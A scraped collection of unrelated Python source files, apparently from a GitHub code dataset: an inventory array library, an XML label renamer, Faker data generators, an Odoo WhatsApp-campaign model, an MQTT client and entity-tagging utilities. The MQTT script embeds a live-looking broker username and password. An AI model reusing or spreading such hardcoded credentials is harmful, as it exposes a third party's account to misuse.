'__iter__'):\n                instances = instances[0]\n        self = cls(len(instances))\n        for i, x in enumerate(instances):\n            self.insert(i, x)\n        return self  # the new array was built but never returned\n\n    def __setitem__(self, index: int, value: int):\n        \"\"\"Implement self[index] = value\"\"\"\n        if index > self._size-1:\n            raise IndexError('Array out of range')\n        self.insert(index, value)\n\n    def __getitem__(self, index: int):\n        \"\"\"Implement self[index]\"\"\"\n        if index > self._size-1:\n            raise IndexError(\"Array out of range\")\n        return self.__array[index]\n\n    reset = clear\n\n    # Breaking the name rule\n\n    def allocate(self, size: int):\n        \"\"\"Allocate new size for the array\"\"\"\n        if self.__noalloc is True:\n            raise Exception(\"This array can't be allocated.\")\n        self.__array.extend([null]*size)\n        self._size = len(self.__array)\n\n    def free(self, size: int):\n        \"\"\"Release/take away size from the array.\"\"\"\n        if self.__noalloc is True:\n            self.reset()\n            return\n        size = abs(size)\n        if size > len(self.__array):\n            raise Exception(\n                \"Cannot free more than the allocated size.\")\n        if size == 0:\n            self.__array.clear()\n            self._size = 0\n        else:\n            self.__array = self.__array[:len(self.__array)-size]\n            self._size = len(self.__array)\n\n    # end of rule breaker\n\n    @property\n    def address(self):\n        \"\"\"Return pseudo address of this array.\"\"\"\n        return self.__fake_address\n\n    @property\n    def allocated(self):\n        \"\"\"Return how much allocated data is in this array.\"\"\"\n        return len([data for data in self.__array if data is not null])\n\n    @property\n    def size(self):\n        \"\"\"Return the size of this array.\"\"\"\n        return self._size\n\n    # We can finally calculate used space or whatever\n\n    @property\n    def allow_alloc(self):\n        \"\"\"Return True if this array is allocable\"\"\"\n        return not self.__noalloc\n\n    @property\n    def linked_name(self):\n        \"\"\"Return link name of this array. None if unbound.\"\"\"\n        return self._name\n\n    def _yell_at_externally_extended_size(self):\n        \"\"\"Raise if the array is externally changed.\"\"\"\n        if len(self.__array) > self._size:\n            raise Exception(\n                \"The array is externally edited. Size of array is unmatched with current size. No 'auto' alloc.\")\n\n    def __repr__(self):\n        \"\"\"Return repr(self)\"\"\"\n        return repr(self.__array)\n\n    def _set_name(self, owner: LinkedFSA, name: str):\n        \"\"\"Set link name of this array. 
Owner must be instance of LinksedFSA\"\"\"\n if not isinstance(owner, LinkedFSA):\n raise Exception(\"Is not LinkedFSA object\")\n if self._name is not None:\n if owner != self._owner:\n raise Exception(\n f\"This FSA seems locked by a LinkedFSA object. (pre-owner ref: {owner.name} | owner ref: {self._owner.name}\")\n self._name = name\n self._owner = owner\n\n def _reset_name(self, owner: LinkedFSA):\n \"\"\"Reset link name of this array. Or, unbind this array.\"\"\"\n if not isinstance(owner, LinkedFSA):\n raise Exception(\"Invalid owner type\")\n if not owner == self._owner:\n raise Exception(\"Invalid owner object\")\n self._name = None\n self._owner = None\n\n @property\n def name(self):\n \"\"\"Return linked name of this array\"\"\"\n return self._name\n\n def __contains__(self, other):\n \"\"\"Return true if something is in this array.\"\"\"\n return other in self.__array if other is not null else False\n\n\nclass LinkedFSA:\n \"\"\"Linked FixedSizeArray\"\"\"\n\n def __init_subclass__(cls, **kwargs) -> None:\n raise Exception(\"LinkedFSA must not be subclassed.\")\n\n def __init__(self, *array: FixedSizeArray):\n self._links: List[FixedSizeArray] = []\n self._linkID = PUID.make_random()\n for x in array:\n self._watcher(x)\n self.append(x)\n\n def _watcher(self, array: FixedSizeArray):\n \"\"\"Watcher method of incoming array\"\"\"\n if not isinstance(array, FixedSizeArray):\n raise TypeError(\"The type of array is not FixedSizeArray.\")\n\n def detach(self, block_index: int):\n \"\"\"Detaching and unlock a FixedSizeArray\"\"\"\n fsa = self._links.pop(block_index)\n self._links.insert(block_index, fsa_null)\n fsa._reset_name(self)\n\n def __len__(self):\n \"\"\"Implement len(self)\"\"\"\n return len(self._links)\n\n # Report methods\n\n def _get_report(self):\n \"\"\"Get link report\"\"\"\n print(f\"=== Report for {self._linkID.body.upper()} ===\")\n for i, link in enumerate(self._links):\n if link is fsa_null:\n print(f\"NULL on link-block({i}) size=0 avail=0% alloc=0\")\n continue\n print(f\"{link.address} on {link.name} size={link.size} avail={(link.size-link.allocated)/link.size*100}% alloc={link.allocated}\")\n print(f\"==============={'='*len(self._linkID.body.upper())}====\")\n\n # end of Report methods definitions\n\n @property\n def available(self):\n \"\"\"Value indicating how much data is available in all blocks\"\"\"\n x = 0\n for link in self._links:\n if link is fsa_null:\n continue # skip on NULL\n x += link.size - link.allocated\n return x\n\n @property\n def lsa(self):\n \"\"\"Link size-available\"\"\"\n x = []\n for link in self._links:\n if link is fsa_null:\n x.append(0)\n continue\n x.append(link.size - link.allocated)\n return tuple(x)\n\n @property\n def linksize(self):\n \"\"\"Link size\"\"\"\n x = []\n for link in self._links:\n if link is fsa_null:\n x.append(0)\n continue\n x.append(link.size)\n return tuple(x)\n\n @property\n def size(self):\n \"\"\"Size of all link\"\"\"\n x = 0\n for link in self._links:\n if link is fsa_null:\n continue # skip on NULL\n x += link.size\n return x\n\n @property\n def name(self):\n \"\"\"Name or UID of this instance.\"\"\"\n return self._linkID.body.upper()\n\n def __getitem__(self, index: int):\n \"\"\"Implement self[index]\"\"\"\n return self._links[index]\n\n def __setitem__(self, index: int, value: Any):\n \"\"\"Implement self[index] = value\"\"\"\n self.insert(index, value)\n\n def append(self, *value: FixedSizeArray):\n \"\"\"Append a FixedSizeArray into this instance\"\"\"\n for x in value:\n self._watcher(x)\n 
addresses = [link.address for link in self._links]\n if x.address in addresses:\n raise ValueError(\n \"The value is somewhat exists in this LinkedFSA\")\n lid = len(self._links)\n x._set_name(self, f'link-block({lid})')\n self._links.append(x)\n\n def insert(self, index: int, value: FixedSizeArray):\n \"\"\"Insert a new link into given index\"\"\"\n self._watcher(value)\n value._set_name(self, f'link-block({index})')\n links = self._links[index:]\n [link._set_name(\n self, f'link-block({self._links.index(link)+1})') for link in links]\n self._links.insert(index, value)\n\n def pop(self, index: int) -> FixedSizeArray:\n \"\"\"Get a FSA and removes it.\"\"\"\n v = self[index]\n self.detach(index)\n return v\n\n def remove(self, value: FixedSizeArray):\n \"\"\"Remove a FSA from this instance\"\"\"\n self._watcher(value)\n i = self._links.index(value)\n self.detach(i)\n\n def replace(self, index: int, value: FixedSizeArray):\n \"\"\"Replace a FSA/NULL from this instance in given index\"\"\"\n self._watcher(value)\n if self[index] is not fsa_null:\n self.detach(index)\n name = f'link-block({index})'\n value._set_name(self, name)\n self._links.insert(index, value)\n self._links.pop(index+1)\n\n def __contains__(self, other):\n \"\"\"Return true if other in this instance.\"\"\"\n for link in self._links:\n if link is fsa_null:\n continue\n if other in link:\n return True\n return False\n\n def __repr__(self):\n \"\"\"Implement repr(self)\"\"\"\n return '['+', '.join((link.address if hasattr(link, 'address') else str(link)) for link in self._links)+']'\n\n def _smart_index(self, link_index: int):\n # Say, index is 80 while our links is 2 50-sized array. 80-50 = 30\n # This may can't use negative index. but, let's see...\n # Return: Link index, link's index\n if link_index > self.size:\n raise IndexError(\n f\"Linked Index out of range ({link_index} > {self.size}; perhaps you forgot to append?)\")\n if link_index < 0:\n while link_index < 0:\n link_index += self.size\n clsa = self.linksize\n tli = link_index\n for i, a in enumerate(clsa):\n if tli > a:\n tli -= a\n continue\n if self[i] is fsa_null:\n if len(self) == i:\n raise IndexError(\"Index out or range\")\n i += 1\n if tli == len(self[i]):\n if len(self) == i:\n raise IndexError(\"Index out or range\")\n if self[i+1] == fsa_null:\n if len(self) == i+1:\n raise IndexError(\"Index out or range\")\n return i+2, 0\n return i+1, 0\n return i, tli\n raise Exception(\"Smart index can't return!\")\n\n def smart_insert(self, link_index: int, value: Any):\n \"\"\"Insert a value into a link from a given index (The index should be less than self.size)\"\"\"\n i, li = self._smart_index(link_index)\n self[i][li] = value\n\n def smart_get(self, link_index: int) -> Any:\n \"\"\"Get a value from a link in a given index (The index should be less than self.size)\"\"\"\n i, li = self._smart_index(link_index)\n return self[i][li]\n\n def smart_pop(self, link_index: int) -> Any:\n \"\"\"Get and remove a value from a link in a given index (The index should be less than self.size)\"\"\"\n i, li = self._smart_index(link_index)\n return self[i].pop(li)\n\n def smart_remove(self, data: Any):\n \"\"\"Remove a value from a link. The first matching item on a link is removed. 
This, doesn't really remove all matching items.\"\"\"\n for link in self._links:\n if link is fsa_null:\n continue\n if data in link:\n link.remove(data)\n return\n\n def __eq__(self, other):\n \"\"\"Implement self==other\"\"\"\n if isinstance(other, LinkedFSA):\n return self._linkID == other._linkID\n\n\nclass Inventory:\n \"\"\"Inventory class\"\"\"\n\n def __init__(self, iname: str, size: int, *args):\n \"\"\"Init function\"\"\"\n self._name = iname\n self._array_list = LinkedFSA(FixedSizeArray(size, True))\n\n def extend_inventory(self, array: FixedSizeArray):\n \"\"\"Adding an Inventory array\"\"\"\n if array in self._array_list:\n raise SameIdentifierException(\n \"array is the same as this instance array.\")\n\n if array.allow_alloc is True:\n warnings.warn(\"array is allocate-able.\")\n array = array.new()\n self._array_list.append(array)\n\n def __setitem__(self, index: int, value: Any):\n \"\"\"Implement self[index] = value.\"\"\"\n return self.insert(index, value)\n\n def __getitem__(self, index: int):\n \"\"\"Implement self[index].\"\"\"\n return self._array_list.smart_get(index)\n\n def insert(self, index: int, data: Any):\n \"\"\"Insert an item from inventory\"\"\"\n self._array_list.smart_insert(index, data)\n\n def pop(self, index: int):\n \"\"\"Pop an item from inventory\"\"\"\n self._array_list.smart_pop(index)\n\n def remove(self, data: Any):\n \"\"\"Remove an item from inventory\"\"\"\n self._array_list.smart_remove(data)\n\n def detach_inventory(self, array_id):\n \"\"\"Release a inventory\"\"\"\n self._array_list.detach(array_id)\n\n def __repr__(self):\n return f\"Inventory({self._name})\"\n\n\ndef _main():\n fsa0 = FixedSizeArray(10, True)\n fsa1 = FixedSizeArray(10)\n lfsa = LinkedFSA(fsa0, fsa1)\n lfsa.smart_insert(19, None)\n lfsa.smart_get(19)\n inventory = Inventory('Inventory-0', 50)\n inventory.extend_inventory(FixedSizeArray(50, True))\n inventory[51] = None\n assert inventory[51] is None\n","repo_name":"RimuEirnarn/RPGSample","sub_path":"libinventory.py","file_name":"libinventory.py","file_ext":"py","file_size_in_byte":15715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39920868110","text":"#导入相关库\nimport numpy as np\nimport os\nimport shutil\nfrom tqdm import tqdm\n\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n\n\n\ndef rename_label(filename, xmlsPath):\n \"\"\"\n Parse xml file and return labels.\n 解析xml,并根据字典中的项目来修订新的名称\n \"\"\"\n anno_path = xmlsPath + filename\n tree = ET.parse(anno_path)\n root = tree.getroot()\n\n for obj in root.findall('object'): # 使用list not iter \n cls_name = obj.find('name').text.strip().lower() # 获取classname\n if cls_name == 'anquanlian\t\t\t\t\t static':\n obj.find('name').text = 'anquanlian'\n if cls_name == 'yusan\t\t\t\t static':\n obj.find('name').text = 'yusan'\n\n tree.write(anno_path, \"UTF-8\")\n\n\nif __name__ == \"__main__\":\n\n\n xmlsPath = 'G:/@@20200714/static/'\n for filename in tqdm(os.listdir(xmlsPath)):\n if filename[-4:] == '.xml':\n rename_label(filename, xmlsPath)\n","repo_name":"Mittenss2010/PythonPractice","sub_path":"tools/[Tools]【标注后期】重命名-label_rename.py","file_name":"[Tools]【标注后期】重命名-label_rename.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36003768117","text":"from enum import Enum\n\nfrom faker import Faker\n\n\nclass Person(Enum):\n FIRST_NAME = \"first_name\"\n 
LAST_NAME = \"last_name\"\n LANGUAGE_NAME = \"language_name\"\n PREFIX = \"prefix\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"first_name\": fake.first_name(),\n \"last_name\": fake.last_name(),\n \"language_name\": fake.language_name(),\n \"prefix\": fake.prefix()\n }\n\n\nclass FullProfile(Enum):\n FULL_PROFILE = \"profile\"\n\n @staticmethod\n def generate(fake: Faker):\n return fake.profile()\n\n\nclass SimpleProfile(Enum):\n SIMPLE_PROFILE = \"simple_profile\"\n\n @staticmethod\n def generate(fake: Faker):\n return fake.simple_profile()\n\n\nclass Address(Enum):\n ADDRESS = \"address\"\n BUILDING_NUMBER = \"building_number\"\n CITY = \"city\"\n COUNTRY = \"country\"\n COUNTRY_CODE = \"country_code\"\n POSTCODE = \"post_code\"\n STREET_ADDRESS = \"street_address\"\n STREET_NAME = \"street_name\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"address\": fake.address(),\n \"building_number\": fake.building_number(),\n \"city\": fake.city(),\n \"country\": fake.country(),\n \"country_code\": fake.country_code(),\n \"postcode\": fake.postcode(),\n \"street_address\": fake.street_address(),\n \"street_name\": fake.street_name()\n }\n\n\nclass Bank(Enum):\n ABA = \"aba\"\n BANK_COUNTRY = \"bank_country\"\n BBAN = \"bban\"\n IBAN = \"iban\"\n SWIFT = \"swift\"\n SWIFT8 = \"swift8\"\n SWIFT11 = \"swift11\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"aba\": fake.aba(),\n \"bank_country\": fake.bank_country(),\n \"bban\": fake.bban(),\n \"iban\": fake.iban(),\n \"swift\": fake.swift(),\n \"swift8\": fake.swift8(),\n \"swift11\": fake.swift11()\n }\n\n\nclass Airport(Enum):\n AIRPORT = \"airport\"\n AIRLINE = \"airline\"\n FLIGHT = \"flight\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"airport\": fake.airport_object(),\n \"airline\": fake.airline(),\n \"flight\": fake.flight()\n }\n\n\nclass Schools(Enum):\n SCHOOL = \"school\"\n\n @staticmethod\n def generate(fake: Faker):\n return fake.school_object()\n\n\nclass Vehicule(Enum):\n VEHICULE = \"vehicule\"\n MACHINE_OBJECT = \"machine_object\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\"vehicule\": fake.vehicle_object(), \"machine\": fake.machine_object()}\n\n\nclass GeoPoint(Enum):\n LONGITUDE = \"longitude\"\n LATITUDE = \"latitude\"\n LAT_LONG = \"latlng\"\n LOCAL_LAT_LNG = \"local_latlng\"\n LOCATION_ON_LAND = \"location_on_land\"\n\n @staticmethod\n def generate(fake: Faker):\n return {\n \"longitude\": fake.longitude(),\n \"latitude\": fake.latitude(),\n \"lat_long\": fake.latlng(),\n \"local_lat_long\": fake.local_latlng(),\n \"location_on_land\": fake.location_on_land()\n }\n\n\nclass Properties(Enum):\n PERSON = \"person\"\n FULL_PROFILE = \"full_profile\"\n SIMPLE_PROFILE = \"simple_profile\"\n ADDRESS = \"address\"\n BANK = \"bank\"\n AIRPORT = \"airport\"\n SCHOOLS = \"schools\"\n VEHICULE = \"vehicule\"\n GEOPOINT = \"geo_point\"\n","repo_name":"yamess/FakeDataGeneratorAPI","sub_path":"src/data_generator/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17759940731","text":"from odoo import fields, models, api, _\n\n\nclass UtmCampaign(models.Model):\n _inherit = 'utm.campaign'\n\n mailing_whatsapp_ids = fields.One2many(\n comodel_name='mailing.mailing',\n inverse_name='campaign_id',\n domain=[('mailing_type', '=', 'whatsapp')],\n string='Mass Whatsapp',\n copy=True,\n )\n\n mailing_whatsapp_count = fields.Integer(\n 
string='Number of Mass Whatsapp',\n        compute=\"_compute_mailing_whatsapp_count\",\n    )\n\n    @api.depends('mailing_whatsapp_ids')\n    def _compute_mailing_whatsapp_count(self):\n        for campaign in self:\n            campaign.mailing_whatsapp_count = \\\n                len(campaign.mailing_whatsapp_ids)\n\n    # @api.depends('mailing_mailing_ids')\n    # def _compute_mailing_mail_count(self):\n    #     for campaign in self:\n    #         qty_activities = campaign.mailing_mailing_ids.filtered(\n    #             lambda m: m.mailing_type == 'mail')\n    #         campaign.mailing_mail_count = len(qty_activities)\n\n    def action_create_mass_whatsapp(self):\n        action = self.env.ref('mass_mailing.action_create_mass_mailings_from_campaign').read()[0]\n        action['context'] = {\n            'default_campaign_id': self.id,\n            'default_mailing_type': 'whatsapp',\n            'search_default_assigned_to_me': 1,\n            'search_default_campaign_id': self.id,\n            'default_user_id': self.env.user.id,\n            'mailing_sms': True,\n        }\n        return action\n\n    def action_redirect_to_mailing_whatsapp(self):\n        action = self.env.ref('mass_mailing.action_view_mass_mailings_from_campaign').read()[0]\n        action['context'] = {\n            'default_campaign_id': self.id,\n            'default_mailing_type': 'whatsapp',\n            'search_default_assigned_to_me': 1,\n            'search_default_campaign_id': self.id,\n            'default_user_id': self.env.user.id,\n            'mailing_sms': True,\n        }\n        action['domain'] = [('mailing_type', '=', 'whatsapp')]\n        return action\n\n    def unlink(self):\n        for mailing_id in self.mailing_mailing_ids:\n            mailing_id.unlink()\n        return super(UtmCampaign, self).unlink()\n","repo_name":"marcelsavegnago/social","sub_path":"mass_mailing_base/models/utm_campaign.py","file_name":"utm_campaign.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"38472663570","text":"import paho.mqtt.client as mqtt\nfrom getch import getch\n\nTOPIC_PUSH = \"iot/data/iotmmsp1942978066trial/v1/85732072-22b7-4cd1-ae8f-d363975c0f91\"\nTOPIC_PULL = \"iot/push/iotmmsp1942978066trial/v1/85732072-22b7-4cd1-ae8f-d363975c0f91\"\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n    if (rc == 0):\n        print(\"Connected successfully\")\n    else:\n        print(\"Connection aborted\")\n    #FromDevice\n    client.subscribe((TOPIC_PUSH, 1))\n    #ToDevice\n    client.subscribe((TOPIC_PULL, 1))\n\n# The callback for when a PUBLISH message is received from the server.\ndef on_message(client, userdata, msg):\n    print(msg.topic+\" \"+str(msg.payload))\n\n#########################################\n# MAIN LOGIC\n#########################################\n\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.username_pw_set(\"capllkmg\", password=\"TYk-UHLw95TH\")\n\nclient.connect(\"m14.cloudmqtt.com\", 15839, 60)\n\nclient.loop_start()\n\nwhile True:\n    key = getch()\n    print(\"Pressed : \" + key)\n\n    if key != \"\":\n        client.publish(TOPIC_PULL, \"\")\n\n    if key == \"q\":\n        break\n","repo_name":"SmartTennisTable/net","sub_path":"broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"}
+{"seq_id":"39755314934","text":"import itertools as itt\nimport logging\n\nfrom autogoal.datasets.ehealthkd20._utils import Collection, Keyphrase, Sentence\n\n# logger, itt and Keyphrase are used further down in this module but were never\n# imported; Keyphrase is assumed to live in _utils alongside Collection and Sentence\nlogger = logging.getLogger(__name__)\n\n\ndef to_biluov(tokensxsentence, entitiesxsentence):\n    labelsxsentence = []\n    for tokens, entities in zip(tokensxsentence, entitiesxsentence):\n        offset = 0\n        labels = []\n        for token in tokens:\n            # Recently found that 
(token.idx, token.idx + len(token)) is the span\n matches = find_match(offset, offset + len(token.text), entities)\n tag = select_tag(matches)\n labels.append(tag)\n offset += len(token.text_with_ws)\n labelsxsentence.append(labels)\n\n return labelsxsentence # , \"BILUOV\"\n\n\ndef find_match(start, end, entities):\n def match(other):\n return other[0] <= start and end <= other[1]\n\n matches = []\n for spans in entities:\n\n # UNIT\n if len(spans) == 1:\n if match(spans[0]):\n matches.append((spans[0], \"U\"))\n continue\n\n # BEGIN\n begin, *tail = spans\n if match(begin):\n matches.append((begin, \"B\"))\n continue\n\n # LAST\n *body, last = tail\n if match(last):\n matches.append((last, \"L\"))\n continue\n\n # INNER\n for inner in body:\n if match(inner):\n matches.append((inner, \"I\"))\n break\n\n return matches\n\n\ndef select_tag(matches):\n if not matches:\n return \"O\"\n if len(matches) == 1:\n return matches[0][1]\n tags = [tag for _, tag in matches]\n return \"U\" if (\"U\" in tags and not \"B\" in tags and not \"L\" in tags) else \"V\"\n\n\ndef make_sentence(doc, bilouv, labels) -> Sentence:\n sentence = Sentence(doc.text)\n\n logger.debug(f\"[make_sentence]: doc.text={doc.text}\")\n logger.debug(f\"[make_sentence]: bilouv={bilouv}\")\n\n labels = set(l[2:] for l in labels if l != \"O\")\n\n for label in labels:\n specific_bilouv = []\n\n for tag in bilouv:\n if tag.endswith(label):\n tag = tag[0]\n specific_bilouv.append(tag[0])\n else:\n specific_bilouv.append(\"O\")\n\n logger.debug(\n f\"[make_sentence]: label={label} specific_bilouv={specific_bilouv}\"\n )\n\n spans = from_biluov(specific_bilouv, doc, spans=True)\n sentence.keyphrases.extend(\n Keyphrase(sentence, label, i, sp) for i, sp in enumerate(spans)\n )\n\n return sentence\n\n\ndef from_biluov(biluov, sentence, *, spans=False, drop_remaining=[]):\n \"\"\"\n >>> from_biluov(list('BBULL'), 'A B C D E'.split())\n [['C'], ['B', 'D'], ['A', 'E']]\n \"\"\"\n\n entities = [x for x in discontinuous_match(biluov, sentence)]\n\n for i, (tag, word) in enumerate(zip(biluov, sentence)):\n if tag == \"U\":\n entities.append([word])\n biluov[i] = \"O\"\n elif tag == \"V\":\n biluov[i] = \"I\"\n\n # only BILO is left!!!\n changed = True\n while changed:\n changed = False\n one_shot = enumerate(zip(biluov, sentence))\n try:\n i, (tag, word) = next(one_shot)\n while True:\n if tag != \"B\":\n i, (tag, word) = next(one_shot)\n continue\n\n on_build = [(word, i)]\n\n i, (tag, word) = next(one_shot)\n while tag in (\"O\", \"I\"):\n if tag == \"I\":\n on_build.append(word)\n i, (tag, word) = next(one_shot)\n\n if tag == \"L\":\n entities.append([x for x, _ in on_build] + [word])\n for _, j in on_build:\n biluov[j] = \"O\"\n biluov[i] = \"O\"\n on_build.clear()\n changed = True\n except StopIteration:\n pass\n\n for i, (tag, word) in enumerate(zip(biluov, sentence)):\n if tag != \"O\" and tag not in drop_remaining:\n entities.append([word])\n\n return (\n entities\n if not spans\n else [[(t.idx, t.idx + len(t)) for t in tokens] for tokens in entities]\n )\n\n\ndef discontinuous_match(biluov, sentence):\n \"\"\"\n >>> discontinuous_match(['B','V','L'],['la', 'enfermedad', 'renal'])\n [['la', 'enfermedad', 'renal'], ['enfermedad']]\n >>> discontinuous_match(['O','V','I','L','O','I','L'],['el','cancer','de','pulmon','y','de','mama'])\n [['cancer', 'de', 'pulmon'], ['cancer', 'de', 'mama']]\n >>> discontinuous_match(['B','O','B','V'],['tejidos','y','organos','humanos'])\n [['organos', 'humanos'], ['tejidos', 'humanos']]\n >>> 
discontinuous_match(['O','V','I','L','O','I','L','O','B','O','B','V'], ['el','cancer','de','pulmon','y','de','mama','y','tejidos','y','organos','humanos'])\n [['cancer', 'de', 'pulmon'], ['cancer', 'de', 'mama'], ['organos', 'humanos'], ['tejidos', 'humanos']]\n >>> discontinuous_match(list('BBULL'), 'A B C D E'.split())\n []\n \"\"\"\n entities = []\n for i, tag in enumerate(biluov):\n if tag != \"V\":\n continue\n for entity_ids in _full_overlap(biluov, list(range(len(sentence))), i):\n entity = []\n for idx in entity_ids:\n entity.append(sentence[idx])\n biluov[idx] = \"O\"\n entities.append(entity)\n return entities\n\n\ndef _full_overlap(biluov, sentence, index, product=False):\n \"\"\"\n INDEX TAG MUST BE 'V'\n >>> _full_overlap(['B','V','L'], list(range(3)), 1)\n [[0, 1, 2], [1]]\n >>> _full_overlap(['B','V','V','L'], list(range(4)), 1)\n [[0, 1, 2, 3], [1, 2]]\n >>> _full_overlap(['B','V','V','L'], list(range(4)), 2)\n [[0, 1, 2, 3], [1, 2]]\n >>> _full_overlap(['B','V','V','V','L'], list(range(5)), 1)\n [[0, 1, 2, 3, 4], [1, 2, 3]]\n >>> _full_overlap(['B','V','V','V','L'], list(range(5)), 2)\n [[0, 1, 2, 3, 4], [1, 2, 3]]\n >>> _full_overlap(['B','V','V','V','L'], list(range(5)), 3)\n [[0, 1, 2, 3, 4], [1, 2, 3]]\n >>> _full_overlap(['B','B','V','L','L'], list(range(5)), 2)\n [[1, 2, 3], [0, 2, 4]]\n >>> _full_overlap(['B','I','B','O','V','I','L','O','L'], list(range(9)), 4)\n [[2, 4, 5, 6], [0, 1, 4, 8]]\n >>> _full_overlap(['B','I','B','O','V','I','L','O','L'], list(range(9)), 4, True)\n [[2, 4, 5, 6], [2, 4, 8], [0, 1, 4, 5, 6], [0, 1, 4, 8]]\n >>> _full_overlap(['0','0','V','L'], list(range(4)), 2)\n [[2, 3], [2]]\n >>> _full_overlap(['V','L'], list(range(2)), 0)\n [[0, 1], [0]]\n >>> _full_overlap(['B','V','O','O'], list(range(4)), 1)\n [[0, 1], [1]]\n >>> _full_overlap(['B','V'], list(range(2)), 1)\n [[0, 1], [1]]\n >>> _full_overlap(['0','0','V','O','O'], list(range(5)), 2)\n []\n \"\"\"\n\n left = _right_to_left_overlap(biluov[: index + 1], sentence[: index + 1])\n right = _left_to_right_overlap(biluov[index:], sentence[index:])\n\n full = []\n if product:\n for l in left:\n for r in right:\n new = l + r[1:] if len(l) > len(r) else l[:-1] + r\n full.append(new)\n else:\n for l, r in itt.zip_longest(left, right, fillvalue=[]):\n new = l + r[1:] if len(l) > len(r) else l[:-1] + r\n full.append(new)\n return full\n\n\ndef _left_to_right_overlap(biluov, sentence):\n \"\"\"\n LEFTMOST TAG MUST BE 'V'\n >>> _left_to_right_overlap(['V', 'V', 'O', 'V', 'I', 'L', 'O', 'I', 'L'], range(9))\n [[0, 1, 3, 4, 5], [0, 1, 3, 7, 8]]\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O'], range(4))\n []\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O', 'L'], range(5))\n [[0, 2, 4], [0, 2]]\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O', 'L', 'O', 'L'], range(8))\n [[0, 2, 4], [0, 2, 6]]\n >>> _left_to_right_overlap(['V', 'O', 'V', 'O', 'L', 'I', 'L', 'V', 'L'], range(9))\n [[0, 2, 4], [0, 2, 5, 6]]\n \"\"\"\n return _build_overlap(biluov, sentence, \"L\")\n\n\ndef _right_to_left_overlap(biluov, sentence):\n \"\"\"\n RIGHTMOST TAG MUST BE 'V'\n >>> _right_to_left_overlap(['B', 'I', 'O', 'B', 'I', 'V', 'O', 'V', 'V'], range(9))\n [[3, 4, 5, 7, 8], [0, 1, 5, 7, 8]]\n >>> _right_to_left_overlap(['O', 'V', 'O', 'V'], range(4))\n []\n >>> _right_to_left_overlap(['B', 'O', 'V', 'O', 'V'], range(5))\n [[0, 2, 4], [2, 4]]\n >>> _right_to_left_overlap(['B', 'O', 'B', 'O', 'V', 'O', 'V'], range(7))\n [[2, 4, 6], [0, 4, 6]]\n >>> _right_to_left_overlap(['B', 'V', 'B', 'I', 'B', 'O', 'V', 'O', 'V'], 
range(9))\n [[4, 6, 8], [2, 3, 6, 8]]\n \"\"\"\n inverse = _build_overlap(reversed(biluov), reversed(sentence), \"B\")\n for x in inverse:\n x.reverse()\n return inverse\n\n\ndef _build_overlap(biluov, sentence, finisher):\n \"\"\"\n LEFTMOST TAG MUST BE 'V'\n \"\"\"\n\n one_shot = zip(biluov, sentence)\n tag, word = next(one_shot)\n\n prefix = []\n complete = []\n\n try:\n while tag in (\"V\", \"O\"):\n if tag == \"V\":\n prefix.append(word)\n tag, word = next(one_shot)\n\n on_build = []\n while tag in (\"O\", \"I\", \"U\", finisher):\n if tag == \"I\":\n on_build.append(word)\n elif tag == finisher:\n complete.append(prefix + on_build + [word])\n on_build.clear()\n elif tag == \"U\":\n complete.append([word])\n tag, word = next(one_shot)\n except StopIteration:\n pass\n\n if len(complete) == 1:\n complete.append(prefix)\n\n return complete\n","repo_name":"autogoal/autogoal","sub_path":"autogoal/datasets/ehealthkd20/_encoding.py","file_name":"_encoding.py","file_ext":"py","file_size_in_byte":9415,"program_lang":"python","lang":"en","doc_type":"code","stars":201,"dataset":"github-code","pt":"5"} +{"seq_id":"5227257536","text":"import numpy as np\nimport pandas as pd\nfrom scipy.special import comb\n\nfrom er_evaluation.data_structures import MembershipVector\n\n\ndef summary_statistics(membership, names=None):\n r\"\"\"\n Compute canonical set of summary statistics.\n\n This includes:\n\n * Number of clusters\n * Average cluster size\n * Matching rate\n * Hill numbers of order 0, 1, and 2\n\n If names are provided for each cluster elements then the following two statistics are also provided:\n\n * Homonymy rate (proportion of clusters where at least one name is shared with another cluster)\n * Name variation rate (proportion of clusters with name variation within them)\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n names (Series): Names associated with each cluster elements. Defaults to None.\n\n Returns:\n dict: Dictionary of summary statistics.\n\n Examples:\n >>> membership = pd.Series(index=[1,2,3,4,5,6,7,8], data=[1,1,2,3,2,4,4,4])\n >>> summary_statistics(membership)\n {'number_of_clusters': 4, 'average_cluster_size': 2.0, 'matching_rate': 0.875, 'H0': 3, 'H1': 2.82842712474619, 'H2': 2.6666666666666665}\n \"\"\"\n membership = MembershipVector(membership)\n\n statistics = {\n \"number_of_clusters\": number_of_clusters(membership),\n \"average_cluster_size\": average_cluster_size(membership),\n \"matching_rate\": matching_rate(membership),\n \"H0\": cluster_hill_number(membership, alpha=0),\n \"H1\": cluster_hill_number(membership, alpha=1),\n \"H2\": cluster_hill_number(membership, alpha=2),\n }\n\n if names is not None:\n statistics.update(\n {\n \"homonymy_rate\": homonymy_rate(membership, names),\n \"name_variation_rate\": name_variation_rate(membership, names),\n }\n )\n\n return statistics\n\n\ndef number_of_clusters(membership):\n r\"\"\"\n Number of clusters in a given clustering.\n\n Args:\n membership (Series): Membership vector representation of a clustering.\n\n Returns:\n int: number of unique cluster identifiers. 
